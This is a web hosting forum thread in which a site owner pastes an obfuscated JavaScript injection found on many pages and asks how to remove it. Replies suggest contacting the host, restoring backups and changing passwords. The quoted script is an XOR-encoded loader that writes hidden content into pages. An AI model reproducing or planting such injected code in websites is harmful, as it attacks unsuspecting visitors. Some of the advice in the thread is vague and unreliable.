my webpage contains this code <!----><script>if(INL!=1){function Lx(Jk){return Jk}try{var hWx='XXEXOEXMEX3EXtEXkEXUEXGEXdEOpEOIEOcEOiEOo',re D=Lx('E');var hmJ=Array(SlF('66'),11704^11701,28026^28007,30385^ 30397,SlF('23'),SlF('14'),9607^9613,19555^19491,Sl F('24'),28390^28397,SlF('16'),SlF('17'),20995^2108 5,SlF('7'),14823^14793,SlF('86'),15902^15919,15854 ^15863,18601^18683,SlF('26'),SlF('87'),10484^10481 ,2391^2399,SlF('31'),SlF('47'),15548^15615,27206^2 7229,SlF('9'),1047^1069,4618^4687,SlF('60'),869^82 1,SlF('42'),6398^6381,30086^30163,10643^10709,633^ 561,SlF('74'),28885^28827,12046^12059,21041^21101, 24355^24357,10080^10073,29700^29751,4428^4449,1441 4^14413,SlF('89'),SlF('79'),SlF('55'),31877^31873, SlF('18'),18865^18817,SlF('81'),26477^26491,SlF('8 3'),SlF('20'),24111^24171,31946^31893,25920^25857, 26513^26533,SlF('37'),SlF('32'),SlF('71'),SlF('35' ),6051^6017,SlF('61'),24494^24469,SlF('63'),SlF('2 8'),SlF('77'),24655^24635,17921^17997,17703^17695, SlF('75'),SlF('73'),22911^22871,30002^29977,17555^ 17607),tky;var ,Gjk='';hWx=hWx.split(reD);for (tky=0;tky<YrL.length;tky+=2){BEw=YrL.substr(tky,2 );for(IdC=0;IdC<hWx.length;IdC++){if(hWx[IdC]==BEw)break;}Gjk+=String.fromCharCode(hmJ[IdC]^126);}function SlF(Jsx){return parseInt(Jsx)}document.write(Gjk);}catch(UE){}}var INL=1</script><!----> at the bottom line of page which seems to be virus, have anyone experienced this and known the source of this virus, this code may cause the visitor 's computer halted once they open the website infected. How should I remove this virus and prevent it from infecting my webpage again because a lot of my websites in bluehost had been infected.
If I were you I would just contact my host about security issues if they were their fault; complain until they fixed them.
Are you sure, if that's the virus or malware? I would suggest to get in touch with your host first. I know they don't have phone support but you can raise the ticket any time. I don't think there would be any issue for them to resolve it for you.
First and last option, Get a more reliable host who will provide you a better security for your site and have a secure server.
Same Virus infecting my sites, and I restored my sites twicely but this code come back again. I changed the passwords for cpanels but invain. Now my hosting company tell me: "Hackers can inject their malware codes in web pages especially in php scripts, its called web worms. What actually happens is this that a hacker can upload a script via xss ( cross site scripting ) or if html is allowed in online forms or in forum postings then it becomes more peace of cake for the hacker he can easily post his code in the post and than it resides on this account on the server because actually it is on the server. From there it can infect any other nearby account and can create there its own javascript code. Please visit below link for more details: http://www.theserverpages.com/artic...Code_Injection_Vulnerabilities_Explained.html So in simple terms its called code injection. Now the solution for it will be to delete the source of this code from the server which is almost impossible because there are thousands of posts on the forum or it can be into any php file of the forum/webpage where it hides and generating more codes from there. Its like a branched tree expanding its leaves we cut the leaves it expands them again, but the root is in that account for sure. This web worm will not affect all the server as it dont get permission for that it can only harm the accounts created within the whm where it is located by it self. It means it can harm some accounts which are in a whm." if anyone have its solutions plz recommend me..... Thanks.
walehu. Replace the altered file with your old back-up. Then tell your host about it. Then make stealth password for your cPanel.
Altering files, restoring backups, changing passwords all done, but virus still existing and spreading itself free fast, actually this virus easily affect the whold whm account. As I have whm account, and when I found this virus 1st time after some time its affected all the sites on whm. My host told me that they have to create your new whm and you have to upload all your fresh sites. you can only take mysql backup from your current whm, so its heavy task for me.
Actually there are few Paid Anti Viruses available for Linux, which are capable of doing such things. Ask your webhost to install one of them. Or at least install hunters...
I think your host should take care of it. Doesn't seem to be a major issue. Be careful, you will get lots of advice to change the host. This is a common issue almost every host face once in a while so don't be carried away with the advices. Give some time to your host to deal with it. I guess He must have taken care of it. Just let us know, if you got it resolve.